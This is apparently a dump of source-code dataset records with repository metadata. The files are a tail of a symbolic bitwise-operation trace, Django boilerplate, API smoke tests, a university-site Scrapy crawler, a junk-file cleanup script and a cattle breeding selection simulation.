ref_40712 = ref_40665 # MOV operation
ref_40718 = (0x1 | ref_40712) # OR operation
ref_40769 = ref_40718 # MOV operation
ref_40771 = ((0x40 - ref_40769) & 0xFFFFFFFFFFFFFFFF) # SUB operation
ref_40779 = ref_40771 # MOV operation
ref_41159 = ref_25063 # MOV operation
ref_41183 = ref_41159 # MOV operation
ref_41187 = ref_40779 # MOV operation
ref_41189 = (ref_41187 & 0xFFFFFFFF) # MOV operation
ref_41191 = ((ref_41183 << ((ref_41189 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_41198 = ref_41191 # MOV operation
ref_41224 = ref_40165 # MOV operation
ref_41228 = ref_41198 # MOV operation
ref_41230 = (ref_41228 | ref_41224) # OR operation
ref_41359 = ref_41230 # MOV operation
ref_41373 = (0xF & ref_41359) # AND operation
ref_41410 = ref_41373 # MOV operation
ref_41424 = ((ref_41410 << (0x2 & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_41461 = ref_39128 # MOV operation
ref_41473 = ref_41424 # MOV operation
ref_41475 = (ref_41473 | ref_41461) # OR operation
ref_41514 = ref_41475 # MOV operation
ref_42268 = ref_37574 # MOV operation
ref_42302 = ref_42268 # MOV operation
ref_42316 = (ref_42302 >> (0x3 & 0x3F)) # SHR operation
ref_42425 = ref_42316 # MOV operation
ref_42439 = (0x7 & ref_42425) # AND operation
ref_42486 = ref_42439 # MOV operation
ref_42492 = (0x1 | ref_42486) # OR operation
ref_42877 = ((((((((ref_5644) << 8 | ref_32099) << 8 | ref_29517) << 8 | ref_30211) << 8 | ref_5648) << 8 | ref_5649) << 8 | ref_5650) << 8 | ref_32793) # MOV operation
ref_42901 = ref_42877 # MOV operation
ref_42905 = ref_42492 # MOV operation
ref_42907 = (ref_42905 & 0xFFFFFFFF) # MOV operation
ref_42909 = ((ref_42901 << ((ref_42907 & 0xFF) & 0x3F)) & 0xFFFFFFFFFFFFFFFF) # SHL operation
ref_42916 = ref_42909 # MOV operation
ref_43276 = ref_41514 # MOV operation
ref_43656 = ref_25063 # MOV operation
ref_43672 = ref_43276 # MOV operation
ref_43684 = ref_43656 # MOV operation
ref_43686 = (ref_43684 | ref_43672) # OR operation
ref_43803 = ref_42916 # MOV operation
ref_43807 = ref_43686 # MOV operation
ref_43809 = (ref_43807 | ref_43803) # OR operation
ref_43848 = ref_43809 # MOV operation
ref_44075 = ref_43848 # MOV operation
ref_44077 = ref_44075 # MOV operation
# Final result, masked to 64 bits to model the width of a machine register.
print ref_44077 & 0xffffffffffffffff
| [
"jonathan.salwan@gmail.com"
] | jonathan.salwan@gmail.com |
321e2ecf857820a2d395f84898feed8eefd6e54e | 42abec8bc24b923dc18114d517bfc467505f0584 | /test | def69bbdfc6b1c9cc09c8bc3b213a73584b3bed6 | [] | no_license | TangYuOG/superTang | b422c00e5ccb52725c776a59f5fb0085559f2ee4 | 76001a717011637af5a81b1a6f1359c734bd4353 | refs/heads/master | 2020-04-04T18:17:13.121364 | 2018-11-05T02:46:20 | 2018-11-05T02:46:20 | 156,157,552 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 811 | #!/usr/bin/env python3
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangodemo02.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"tarena@tedu.cn"
] | tarena@tedu.cn | |
539f747aea7fe6c503a164283f17c23d2cc410ef | 7e9c3b7684a7c9d712382cb170ab2ca1485b5ea2 | /test/test_monty.py | ed1e6c94242cb103125420c1f68e9ec9b17fbb0c | [
"Apache-2.0"
] | permissive | hackerlist/monty-python | 0adabb857d6025b8004f406a10f59a533c3df464 | eb4233e2f0301665e3469401e71d8a54c4503311 | refs/heads/master | 2020-12-30T09:38:07.050584 | 2014-05-24T10:45:23 | 2014-05-24T10:45:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 758 | py | #-*- coding: utf-8 -*-
"""
montypy.test
~~~~~~~~~~~~
Test cases for monty-python
"""
import unittest
import os
from montypy import Monty
TEST_SRV = 'https://monty.criticalpha.se'


class TestMontyPy(unittest.TestCase):
    """Smoke tests: each public Monty endpoint can be called without raising."""

    def _client(self):
        # Build a fresh client per test so no state leaks between cases.
        return Monty(TEST_SRV)

    def test_instantiation(self):
        self._client()

    def test_nodes(self):
        self._client().nodes()

    def test_probes(self):
        self._client().probes()

    def test_scripts(self):
        self._client().scripts()

    def test_results(self):
        self._client().results()

    def test_status(self):
        self._client().status()
| [
"michael.karpeles@gmail.com"
] | michael.karpeles@gmail.com |
74c58f92a24f50e470b93242b98a5a0b06c6581c | 69f2b8f54d923a064bf0de20249b5aa619f1da12 | /example/example/common/urls.py | 6c7ab2725da62af487d78fe557a29dc7035f43b8 | [] | no_license | skibblenybbles/django-dojoforms | 8302dff51f571d35e2c1f8439487baf494cd655c | 75e7b7a1c05c7db64df56352bd9e697450da4dab | refs/heads/master | 2020-12-29T01:41:46.657653 | 2012-11-08T03:55:50 | 2012-11-08T03:55:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 163 | py | from django.conf.urls import patterns, include, url
urlpatterns = patterns("example.common.views",
url(r'^$', "pages.homepage_view", name="homepage"),
)
| [
"mkibbel@gmail.com"
] | mkibbel@gmail.com |
24f50ff549e8c93fb62458eeb8bef3690e2293e6 | 63707652ba98b136744efd61115b7da9decd64ea | /homework1/q3/q3/spiders/q3_spider.py | d299ef2b3f7cf3267c544659ea1f1b26beb153c8 | [] | no_license | yerihyo/cs6200f13 | ad79a576f8ad190ef9f35049df988e62310ed0db | 96c5161a1b767118ded5dee441140fe49c499251 | refs/heads/master | 2021-01-01T18:07:55.390969 | 2013-09-18T22:57:27 | 2013-09-18T22:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,559 | py | from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from q3.items import HyperlinkItem
import re
import urlparse
import sys
from scrapy.exceptions import CloseSpider
# from scrapy.contrib.closespider import CloseSpider
class MyExtractor(SgmlLinkExtractor):
    """Link extractor that only yields http links on www.ccs.neu.edu and
    never yields the same URL twice.

    ``seen_urls`` is deliberately a *class* attribute so the de-duplication
    registry is shared by every extractor instance in the process.
    """
    seen_urls = {}

    def __init__(self, allow=(), deny=(), allow_domains=(), deny_domains=(), restrict_xpaths=(),
                 tags=('a', 'area'), attrs=('href',), canonicalize=True, unique=True, process_value=None,
                 deny_extensions=None, seen_urls=()):
        # Fixes vs. the original:
        #   * attrs defaulted to ('href'), which is just the string 'href';
        #     SgmlLinkExtractor expects an iterable of attribute names, so
        #     the one-element tuple ('href',) is the intended value.
        #   * seen_urls defaulted to a mutable list; an empty tuple avoids
        #     the shared-mutable-default pitfall (it is only iterated here).
        SgmlLinkExtractor.__init__(self, allow=allow, deny=deny, allow_domains=allow_domains, deny_domains=deny_domains, restrict_xpaths=restrict_xpaths,
                                   tags=tags, attrs=attrs, canonicalize=canonicalize, unique=unique, process_value=process_value,
                                   deny_extensions=deny_extensions)
        for l in seen_urls:
            self.seen_urls[l] = True

    def is_valid_link(self, l):
        """Accept *l* only when it is an http URL on www.ccs.neu.edu that has
        not been seen yet; an accepted URL is recorded as a side effect."""
        url = l.url
        p = urlparse.urlparse(url)
        if p.scheme != 'http':
            return False
        if p.netloc != 'www.ccs.neu.edu':
            return False
        if url in self.seen_urls:
            return False
        self.seen_urls[url] = True
        return True

    def extract_links(self, response):
        """Extract links as the base class does, then keep only the valid,
        unseen ones (list comprehension returns a list on Py2 and Py3 alike)."""
        links = SgmlLinkExtractor.extract_links(self, response)  # explicit base call: SgmlLinkExtractor is an old-style class on Py2
        return [link for link in links if self.is_valid_link(link)]
class CCSSpider(CrawlSpider):
    """Crawl www.ccs.neu.edu, emitting a HyperlinkItem for every HTML or PDF
    page reached, and stop the crawl once just over 100 items are produced."""
    name = "ccs.neu.edu"
    start_urls = [
        "http://www.ccs.neu.edu/",
        # "file:///tmp/tt",
    ]
    # Shared extractor; MyExtractor.seen_urls is a class-level dict, so URL
    # de-duplication spans the whole process.
    extractor = MyExtractor(seen_urls=[], tags=('a','area','link'), unique=False, deny_extensions=[])
    count = 0  # items emitted so far (rebound onto the instance on first +=)
    rules = (
        Rule(extractor, callback="parse_page", follow=True),
    )
    def parse(self,response):
        # Mark the start page itself as seen, emit its item(s), then defer to
        # CrawlSpider.parse so Rule-based link following still happens.
        self.extractor.seen_urls[response.url]=True
        for i in self.parse_page(response):
            yield i
        for r in CrawlSpider.parse(self,response):
            yield r
    def parse_page(self,response):
        # Content-Type may carry parameters ("text/html; charset=..."), so
        # split on ';' and check each token for the interesting MIME types.
        content_types = re.split('\s*;\s*',response.headers['Content-Type'])
        url = response.url
        if 'application/pdf' in content_types or 'text/html' in content_types:
            yield HyperlinkItem(url=url)
            self.count += 1
            if self.count>100:
                # Raised inside the generator; propagates when the engine
                # advances it, which aborts the crawl.
                raise CloseSpider("Closing spider")
| [
"yerihyo@gmail.com"
] | yerihyo@gmail.com |
537b65a9a936c8cc8663d161026ab155e899d103 | e3dcfa127f8d1e03b25d9f38d1d93bea9926d3b5 | /weaver/devtools/devclean.py | 183a4076e3b3ab0df35d7611d31c1229f4ca3c85 | [
"MIT"
] | permissive | mikadosoftware/weaver | 72832ff66efb8e352523126865ba1a89ad881ab2 | 58d35b72714a9be78d4bf31d9072b243469f5ffc | refs/heads/master | 2022-12-11T11:01:19.545070 | 2018-09-21T18:36:11 | 2018-09-21T18:36:11 | 76,447,730 | 0 | 0 | MIT | 2022-12-08T00:39:26 | 2016-12-14T10:04:52 | Python | UTF-8 | Python | false | false | 1,535 | py | #!/bin/env python
"""devclean
Usage:
devclean <rootpath> [--show]
devclean (-h | --help)
devclean --version
Options:
-h --help Show this screen.
--version Show version.
--show Only show dont kill files
"""
import os, sys
from fnmatch import fnmatch
from docopt import docopt
# Glob patterns of editor / bytecode droppings that should be removed.
crap_matcher = ['*.*~',
                '*.pyc',
                '#*#']
# Directory names whose subtrees are left completely untouched.
ignore_dirs = ['.git', '__pycache__']


def killfiles(kill_list,
              flag=False):
    '''Delete (or merely list) every path in *kill_list*.

    kill_list -- file paths slated for removal
    flag      -- True: really delete, printing "[x]"; False: dry run, printing "[ ]"
    '''
    for fn in kill_list:
        if flag:
            os.remove(fn)
            print("[x] ", fn)
        else:
            print("[ ] ", fn)


def clean_tree(cwd=None,
               killflag=False):
    '''Walk everything below *cwd* (default: the current directory) and
    remove files matching any pattern in ``crap_matcher``; directories named
    in ``ignore_dirs`` are never descended into.
    '''
    rdir = cwd or os.getcwd()
    kill_list = []
    for root, dirs, files in os.walk(rdir):
        # Prune ignored directories in place so os.walk skips their subtrees.
        # (The original removed entries from `dirs` while iterating it, which
        # silently skips a directory whenever two ignored names are adjacent;
        # rebuilding the list in place avoids that.)
        dirs[:] = [d for d in dirs if d not in ignore_dirs]
        # `any()` also guarantees a file matching several patterns is queued
        # (and hence removed) only once.
        for fname in files:
            if any(fnmatch(fname, pattern) for pattern in crap_matcher):
                kill_list.append(os.path.join(root, fname))
    killfiles(kill_list, killflag)
killfiles(kill_list, killflag)
# Console-script entry point.
def main():
    """Parse the CLI arguments (see the module docstring) and clean the tree."""
    args = docopt(__doc__)
    clean_tree(cwd=args['<rootpath>'],
               killflag=not args['--show'])
if __name__ == '__main__':
    # Running the file directly executes the doctests only; the devclean CLI
    # is exposed through main() (wired up as a console-script entry point).
    import doctest
    doctest.testmod()
| [
"paul@mikadosoftware.com"
] | paul@mikadosoftware.com |
8972f111013667f386ff26b9e44f2e4d03ac2211 | 8c95c48d48a5a6a351de57d90b56eb6e2642914c | /Select_pedigree.py | 6facc3b4d61c02b8d21a1b0c0166f7b7ce1b4d30 | [
"curl",
"Apache-2.0"
] | permissive | janaobsteter/Genotype_CODES | e24dafcf00476a9e0cc989b3c822bd13a391f76f | 8adf70660ebff4dd106c666db02cdba8b8ce4f97 | refs/heads/master | 2021-08-09T14:50:50.721598 | 2021-01-27T14:23:16 | 2021-01-27T14:23:16 | 63,061,123 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 32,186 | py | # -*- coding: utf-8 -*-
from __future__ import division
import os
import sys
import shutil
from collections import defaultdict
import pandas as pd
import numpy as np
from collections import defaultdict
import random
from itertools import chain
from subprocess import call
from selection10 import *
#reload(selection)
#from selection import *
# -*- coding: utf-8 -*-
#############################################33
# Set the population parameters here.
# 1) proportions of animals per category
#nT = 20000 # population size
#perF = 0.9
#perM = 0.1 # proportion of female/male animals in the active population
# proportions of categories within each sex
stNB = 6700                  # number of newborn animals per year
nrF = stNB * 0.5             # newborn females (half of newborns)
telF = 0.966                 # fraction of newborn females that become heifer calves
pt = 0.85                    # fraction of heifer calves that reach breeding-heifer stage
#kraveRemont = 0.25 # or the number of lactations
# STILL MISSING HERE: how many survive the first lactation!
bm = 0.0127                  # bull-dam fraction -- taken FROM THE COWS
#sum([nrF, ptel, tel, pt24, t24, k])
nrM = stNB * 0.5             # newborn males
potomciNP = 0.0135           # planned-mating progeny, as a fraction OF NEWBORNS
vhlevljeni = 0.6             # housed bull calves, fraction OF planned-mating progeny
mladi = 0.30                 # young bulls, fraction WITHIN planned-mating progeny
pripust = 0.70               # natural service, fraction within the housed calves
#pripust = 0.0135 # (alternative: fraction within bulls over 12 months)
telM = 0.73                  # fraction of bulls that become male calves
#cakajoci = 0.018 # (fraction within bulls over 12 months)
bik12 = 0.12                 # fraction of bulls under 12 months surviving to year 2
pb = 0.5                     # fraction of young bulls that become proven (tested) bulls
#nrM + bik12 + bik24
# 2) number of years each category stays in use
kraveUp = 4                  # average number of years (lactations) cows stay = cow turnover
bmUp = 3                     # years bull dams are in use -- turnover!
cak = 3                      # years young bulls spend in progeny test ("waiting" bulls)
pbUp = 5                     # average years proven AI bulls are in use
pripustUp = 1.4              # average years natural-service bulls are in use
genomUp = 1.3                # average years genomically tested bulls are in use
bmOdbira = 2                 # lactation after which bull dams are selected
## semen doses per year
pripustDoz = 15              # doses per natural-service bull
pozitivnoTestDoz = 220       # doses per positively tested (proven) bull
mladiDoz = 250               # doses per young bull
##################################################################################################################3
##################################################################################################################3
# From here on only derived values computed from the parameters above.
##################################################################################################################3
# head counts
# females
nrFn = int(stNB * 0.5)                   # newborn females
telFn = int(telF * nrFn)                 # heifer calves
ptn = int(pt* telFn)                     # breeding heifers
bmn = int(round(ptn * kraveUp *bm))      # bull dams -- out of all cows
#kn = int(k * nF)
#bmn = int(bm * k * nF)
#sum([nrFn, pteln, teln, pt24n, t24n, kn])
nM = 0.5
nrMn = int(round(stNB * 0.5 * (1 - potomciNP)))   # newborn males (excl. planned matings)
telMn = int(round(telM * nrMn))                   # male calves
bik12n = int(round(bik12 * telMn))                # bulls over 12 months
potomciNPn = int(round(potomciNP * nrMn))         # planned-mating progeny
vhlevljenin = int(round(potomciNPn * vhlevljeni)) # housed bull calves
mladin = int(round(mladi * vhlevljenin))          # young bulls (within planned-mating progeny)
#cakajocin = int(cakajoci* nM)
pripustTn = int(round((vhlevljenin - mladin)*pripustUp))  # total natural-service bulls
pripust1n = vhlevljenin - mladin                          # first-year natural service
pripust2n = pripustTn - pripust1n                         # second-year natural service
pbn = int(pb * mladin)                                    # proven bulls
#sum([nrMn, bik12n, bik24n, cakajocin, pripustn, pbn, mladin])
#sum([nrMn, bik12n, bik24n])
##########################################################
#ženske
#odberi novorojene
#tu se ne rabiš obremenjevat s tem, katere so matere in kateri očetje - to narediš na koncu, ko konstruiraš novorojene za naslednjo gene
#ti novorojeni so že prva generacija
#na koncu potegni skupaj ID in kategorije ter to uporabi za določitev staršev#
#tudi šele tam se ukvarjaj z [pb]
import selection
reload(selection)
from selection import *
##############################################################################################3
##############################################################################################3
##############################################################################################3
#VEDNO NAJPREJ IZLOČI /ODBERI PO PV!!! - funckije za odbiro na random imajo pogoj, da je kateogrija prosta
def select_age_0_1(ped, categories):
    """Selection step for newborns (age 0 -> 1): pick heifer calves, housed
    bull calves and male calves from the newborn animals; cull the rest.

    Mutates *ped* and the *categories* dict in place.
    """
    # FEMALES
    ped.set_cat_sex_old("F", "potomciNP", "telF", categories)
    izlF = nrFn - telFn  # how many females to cull
    ped.izloci_poEBV("F", izlF, "nr", categories)  # cull the worst by EBV (module function)
    ped.izberi_poEBV_top("F", (nrFn - izlF), "nr", "telF", categories)  # select heifer calves to be inseminated --> cows
    # MALES
    # select housed bull calves -- ONLY AT START-UP; later they come from bull dams and elite sires!
    ped.izberi_poEBV_top( "M", vhlevljenin, "potomciNP", "vhlevljeni", categories)
    ped.izloci_poEBV("M", int(potomciNPn - vhlevljenin), 'potomciNP', categories)
    ped.izberi_random("M", telMn, "nr", "telM", categories)
    ped.izloci_random("M", int(nrMn - telMn), "nr", categories)
def select_age_1_2(ped, categories):
    """Selection step for yearlings (age 1 -> 2): heifer calves become
    breeding heifers; housed bull calves split into young bulls and
    first-year natural service; male calves become 12-month bulls.
    """
    # FEMALES
    ped.izberi_poEBV_top("F", ptn, 'telF', 'pt', categories)
    ped.izloci_poEBV("F", (len(categories['telF']) - ptn), 'telF', categories)  # remaining heifers are culled
    # MALES
    ped.izberi_poEBV_top( "M", mladin, "vhlevljeni", "mladi", categories)  # select young bulls
    ped.izberi_poEBV_OdDo( "M", mladin, vhlevljenin, "vhlevljeni", "pripust1", categories)  # next tier goes to natural service
    ped.izberi_random( "M", bik12n, 'telM', 'bik12', categories)
    ped.izloci_random( "M", (len(categories['telM']) - bik12n), 'telM', categories)
#tukaj lahk daš vse v eno funkcijo - variabilno - koliko let krave, koliko let v testu
def select_age_2_3(ped, categories):
    """Selection step for adults (age 2+): heifers calve in as cows, bull
    dams are selected/retired, young bulls enter the waiting (progeny-test)
    period, natural-service bulls are extended or culled, and the best
    waiting bulls graduate to proven bulls.
    """
    # FEMALES
    # first add the new cows: inseminated heifers all become cows
    ped.set_cat_old('pt', 'k', categories)
    # then cull the oldest cows - after the configured number of lactations (+2 years rearing)
    if ('k' in categories.keys()) and ((kraveUp+2) in ped.age()):
        ped.izloci_age_cat((kraveUp+2), 'k', categories)
    # carry the remaining cows forward - i.e. EXTEND their cow status
    ped.set_cat_age_old(3, 'k', 'k', categories)
    ped.set_cat_age_old(4, 'k', 'k', categories)
    ped.set_cat_age_old(5, 'k', 'k', categories)
    # once cows are old enough, select bull dams
    # bull dams are selected after the 2nd lactation - age 3-4 (pedigree age 3, since age starts at 0)
    if ('k' in categories.keys()) and ((1 + bmOdbira) in ped.age()):
        ped.izberi_poEBV_top_age("F",3, int(bmn /bmUp), 'k', 'pBM', categories)  # select bull dams
    # and cull the oldest bull dams, if any
    if ('bm' in categories.keys()):
        ped.izloci_cat('bm', categories)
    # carry the remaining bull dams forward
    # 1 year to first insemination, dams selected after lactation bmOdbira, +1 to start shifting
    for i in range((1 + bmOdbira + 1), (1 + bmOdbira + bmUp)):
        ped.set_cat_age_old(i, 'pBM', 'pBM', categories)
    # in the last lactation, demote active bull dams ('pBM') to retired ('bm')
    ped.set_cat_age_old((1 + bmOdbira + bmUp), 'pBM', 'bm', categories)
    # MALES
    # young bulls become waiting bulls (~1 year of inseminations, shortly after age 2)
    ped.set_cat_old('mladi', 'cak', categories)
    ped.set_active_cat('mladi', 2, categories)
    # extend the waiting-bull status (until age 5); also marks them inactive
    #ped.set_cat_age_old(2, 'cak', 'cak', categories)
    # 1 year as young bulls when they start inseminating, `cak` years waiting, +1 to start shifting
    for i in range((2 + 1), (2 + cak)):
        ped.set_cat_age_old(i, 'cak', 'cak', categories)
    # average service period: pick which natural-service bulls survive one more year
    if 'pripust1' in categories.keys():
        ped.izberi_random( "M", pripust2n, 'pripust1', 'pripust2', categories)
        ped.izloci_random( "M", (pripust1n - pripust2n), 'pripust1', categories)
    # carry proven bulls forward
    ped.set_cat_old('pb', 'pb', categories)
    ped.izloci_cat('bik12', categories)
    ped.izloci_cat('pripust2', categories)
    # +2: one year as calves, one year as young bulls
    if ('cak' in categories.keys()) and ((cak+2) in ped.age()):
        ped.izberi_poEBV_top_age("M", (cak +2), int(mladin * 0.5), 'cak', 'pb', categories)
        # must reset here because the select function automatically sets active=1
        ped.set_active_cat('cak', 2, categories)
        # NOTE: the AGE argument is required here!
        ped.izloci_poEBV_age("M",(cak+2), int(mladin * 0.5), 'cak', categories)
def doloci_matere(ped):
    """Assign dams to the newborn generation: up to 90 bull dams produce the
    planned-mating progeny ('potomciNP'); cows produce the rest ('nr').
    """
    # DAMS
    # cap the number of bull-dam mothers at 90
    sTbmMother = 90 if len(ped.catCurrent_indiv('pBM')) >= 90 else len(ped.catCurrent_indiv('pBM'))
    if sTbmMother != 0:
        bmMother = ped.select_mother_random('pBM', sTbmMother)
        ped.set_mother_catPotomca(bmMother, 'potomciNP')
    #
    if 'k' in ped.cat():  # ALL remaining dams are assigned here!
        # select dams excluding the cows intended for commercial crossing
        mother = ped.select_mother_EBV_top('k', int(round(11000*0.7)))
        if len(mother) >= (stNB - sTbmMother):
            # enough cows: sample dams for all newborns (there are more than needed)
            motherOther = random.sample(mother, (stNB - sTbmMother))
            ped.set_mother_catPotomca(motherOther, 'nr')  # ALL DAMS ASSIGNED NOW!
        elif len(mother) < (stNB - sTbmMother):
            # not enough yet: no sampling, use all of them (MINUS commercial crossings)
            ped.set_mother_catPotomca(mother, 'nr')
def doloci_ocete(ped):
    """Assign sires to the newborn generation: elite proven bulls sire the
    planned-mating progeny; young, natural-service and proven bulls (weighted
    by their yearly semen doses) sire the remaining newborns.
    """
    # SIRES
    mladiOce = ped.catCurrent_indiv('mladi')
    pripustOce = ped.catCurrent_indiv('pripust1') + ped.catCurrent_indiv('pripust2')
    # proven bulls of every in-use age; by the time progeny are assigned they are a year older!
    testiraniOce = list(chain.from_iterable([ped.catCurrent_indiv_age('pb', (2 + cak + x)) for x in range(1, pbUp+1)]))
    bmMother = 90 if len(ped.catCurrent_indiv('pBM')) >= 90 else len(ped.catCurrent_indiv('pBM'))
    if 'pb' in ped.cat():
        # a notional elite: random proven bulls, one per bull dam (with replacement)
        elita = np.random.choice(ped.catCurrent_indiv('pb'), bmMother, replace=True)
        # pd.Series(elita).value_counts()  # check per-bull representation
        # elite sires --> bull dams' progeny
        ped.set_father_catPotomca(elita, 'potomciNP')
    # each bull appears once per available semen dose
    ocetje = pripustOce*pripustDoz + testiraniOce*pozitivnoTestDoz + mladiOce*mladiDoz
    if len(ocetje) >= (stNB - potomciNPn*2):  # enough doses for all newborns
        ocetjeNB = random.sample(ocetje, (stNB - potomciNPn*2))  # sires for all cows except bull dams
        ped.set_father_catPotomca(ocetjeNB, 'nr')
    if len(ocetje) < (stNB - potomciNPn*2):
        ped.set_father_catPotomca(ocetje, 'nr')
#####################################################################
#tukaj je zdj funkcija, ki vse to dela!
#####################################################################
#to je funkcija za odbiro in določanje staršev
#prvi pogoj if max gen = 1 je za primer, ko štartaš s praznim naivnim pedigrejem brez staršev - mam in očetov ni v pedigreju
#drugi pogoj,ko dodaš generacijo novorojenih in pelješ prejšnjo generacijo naprej
#tretji krog so združene vse selekcijske odločitve po tem - počasi dobiš bm in pb, če jih ni, se pač ti starši ne določajo
def selekcija_ena_gen(pedFile, categories = None, sex = None, active = None):
    """Run one year of selection decisions and parent assignment, then write
    the external pedigree for AlphaSim.

    Three phases depending on the newest generation in *pedFile*:
    gen 1 -- start from an empty naive pedigree (no parents recorded yet);
    gen 2 -- add a newborn generation and advance the previous one;
    gen >= 3 -- full set of selection decisions; bull dams and proven bulls
    appear gradually (if absent, those parent groups are simply not assigned).

    Returns (ped, categories, sex, active) for the next yearly call.
    """
    ped = pedigree(pedFile)
    if max(ped.gen) == 1:
        ped.set_cat_gen(max(ped.gen), "nr")  # only on the first loop
        ped.set_sex_list([x for x in range(0, ped.rows()) if x % 2 == 0], "F")
        ped.set_sex_list([x for x in range(0, ped.rows()) if x % 2 != 0], "M")
        ped.izberi_poEBV_top_catCurrent("F", int(potomciNPn), 'nr', 'potomciNP')
        ped.izberi_poEBV_top_catCurrent("M", int(potomciNPn), 'nr', 'potomciNP')
        #global categories  # global needed only on the first loop; afterwards it is returned
        categories = ped.save_cat()
        #global sex
        sex = ped.save_sex()
        ped = pedigree(pedFile)
        ped.set_sex_prevGen(sex)  # first selection
        ped.compute_age()
        select_age_0_1(ped, categories)
        ped.add_new_gen_naive(stNB, potomciNPn*2)
        ped.compute_age()
        # assign dams
        doloci_matere(ped)
        # sanity check - must be zero (unless there are not yet enough dams)
        ped.mother_nr_blank()
        # assign sires
        doloci_ocete(ped)
        ped.mother_nr_blank()
        categories.clear()
    if max(ped.gen) == 2:
        # SETSEX!!!
        ped.set_sex_prevGen(sex)
        ped.set_active_prevGen(active)
        # second selection
        ped.set_cat_gen(1, "")
        ped.set_cat_gen(2, "")
        ped.set_cat_old('izl', 'izl', categories)
        ped.compute_age()
        select_age_0_1(ped, categories)
        select_age_1_2(ped, categories)
        ped.add_new_gen_naive(stNB, potomciNPn*2)
        ped.compute_age()
        # assign dams (ALWAYS dams first -- the sire function follows the dams!)
        doloci_matere(ped)
        ped.mother_nr_blank()
        # assign sires
        doloci_ocete(ped)
        ped.mother_nr_blank()
        categories.clear()  # empty last year's dictionary
    if max(ped.gen) >= 3:
        ped.set_sex_prevGen(sex)
        ped.set_active_prevGen(active)
        for i in ped.gens():
            ped.set_cat_gen(i, "")
        ped.set_cat_old('izl', 'izl', categories)
        ped.compute_age()
        select_age_0_1(ped, categories)
        select_age_1_2(ped, categories)
        select_age_2_3(ped, categories)
        ped.add_new_gen_naive(stNB, potomciNPn*2)
        ped.compute_age()
        # assign dams
        doloci_matere(ped)
        ped.mother_nr_blank()
        # assign sires
        doloci_ocete(ped)
        ped.mother_nr_blank()
        categories.clear()  # empty last year's dictionary
    ped.write_ped("/home/jana/bin/AlphaSim1.05Linux/ExternalPedigree.txt")
    return ped, ped.save_cat(), ped.save_sex(), ped.save_active()
#######################################################
#TO JE, ČE ŠTARTAŠ S POLNO AKTIVNO POPULACIJO IN DOLOČIŠ KATEGORIJE
#######################################################
def nastavi_cat(PedFile):
    """Start-up with a FULL active population: assign categories and sexes to
    every animal in *PedFile* by age, add a naive newborn generation, assign
    its parents, and write the external pedigree for AlphaSim.

    Returns (ped, categories, sex, active) for the next yearly call.
    """
    ped = pedigree(PedFile)
    ped.compute_age()
    # MALES FIRST
    # age 0
    # housed bull calves (planned-mating candidates)
    ped.izberi_poEBV_top_age_naive(0, vhlevljenin, 'vhlevljeni')
    # male calves under 12 months
    ped.izberi_random_age_naive(0, telMn, 'telM')
    # age 1
    # young bulls
    ped.izberi_poEBV_top_age_naive(1, mladin, 'mladi')
    # natural service - first year
    ped.izberi_poEBV_OdDo_age_naive(1, mladin, vhlevljenin, 'pripust1')
    # bulls over 12 months
    ped.izberi_random_age_naive(1, bik12n, 'bik12')
    # age 2
    ped.izberi_poEBV_top_age_naive(2, mladin, 'cak')
    ped.izberi_poEBV_OdDo_age_naive(1, mladin, (mladin + pripust2n), 'pripust2')
    # ages 3, 4: waiting (progeny-test) bulls
    for i in [3,4]:
        ped.izberi_poEBV_top_age_naive(i, mladin, 'cak')
    # ages 5-10: proven bulls (capped by the oldest generation present)
    pbAge = range((2 + cak), (2 + cak + pbUp)) if (2 + cak + pbUp) <= max(ped.gens()) else range((2 + cak), max(ped.gens()))
    for i in pbAge:
        ped.izberi_poEBV_top_age_naive(i, 4, 'pb')
    # FEMALES
    # age 0
    # heifer calves under 12 months
    ped.izberi_poEBV_top_age_naive(0, telFn, 'telF')
    # age 1
    # breeding heifers
    ped.izberi_poEBV_top_age_naive(1, ptn, 'pt')
    # age 2
    for i in range(2, (1 + bmOdbira)):
        ped.izberi_poEBV_top_age_naive(i, ptn, 'k')
    # ages 3, 4, 5
    # select active bull dams first, the rest stay cows
    for i in range((1 + bmOdbira), (1 + bmOdbira + bmUp)):
        ped.izberi_poEBV_top_age_naive(i, int(bmn / bmUp), 'pBM')
        ped.izberi_poEBV_top_age_naive(i, (ptn - int(bmn / bmUp)), 'k')
    # age 6
    # retired bull dams
    ped.izberi_poEBV_top_age_naive((1 + bmOdbira + bmUp), int(bmn / bmUp), 'bm')
    # everyone else is culled
    # set sex for the female categories
    ped.set_sex_list(ped.row_cat('telF'), "F")
    ped.set_sex_list(ped.row_cat('pt'), "F")
    ped.set_sex_list(ped.row_cat('k'), "F")
    ped.set_sex_list(ped.row_cat('pBM'), "F")
    ped.set_sex_list(ped.row_cat('bm'), "F")
    # set sex for the male categories
    ped.set_sex_list(ped.row_cat('vhlevljeni'), "M")
    ped.set_sex_list(ped.row_cat('telM'), "M")
    ped.set_sex_list(ped.row_cat('bik12'), "M")
    ped.set_sex_list(ped.row_cat('mladi'), "M")
    ped.set_sex_list(ped.row_cat('cak'), "M")
    ped.set_sex_list(ped.row_cat('pb'), "M")
    ped.set_sex_list(ped.row_cat('pripust1'), "M")
    ped.set_sex_list(ped.row_cat('pripust2'), "M")
    # mark the remaining (uncategorised) animals as culled
    ped.set_cat_list(ped.row_cat(""), 'izl')
    ped.add_new_gen_naive(stNB, potomciNPn*2)
    ped.compute_age()
    # assign dams
    doloci_matere(ped)
    # sanity check - must be zero (unless there are not yet enough dams)
    ped.mother_nr_blank()
    # assign sires
    doloci_ocete(ped)
    ped.mother_nr_blank()
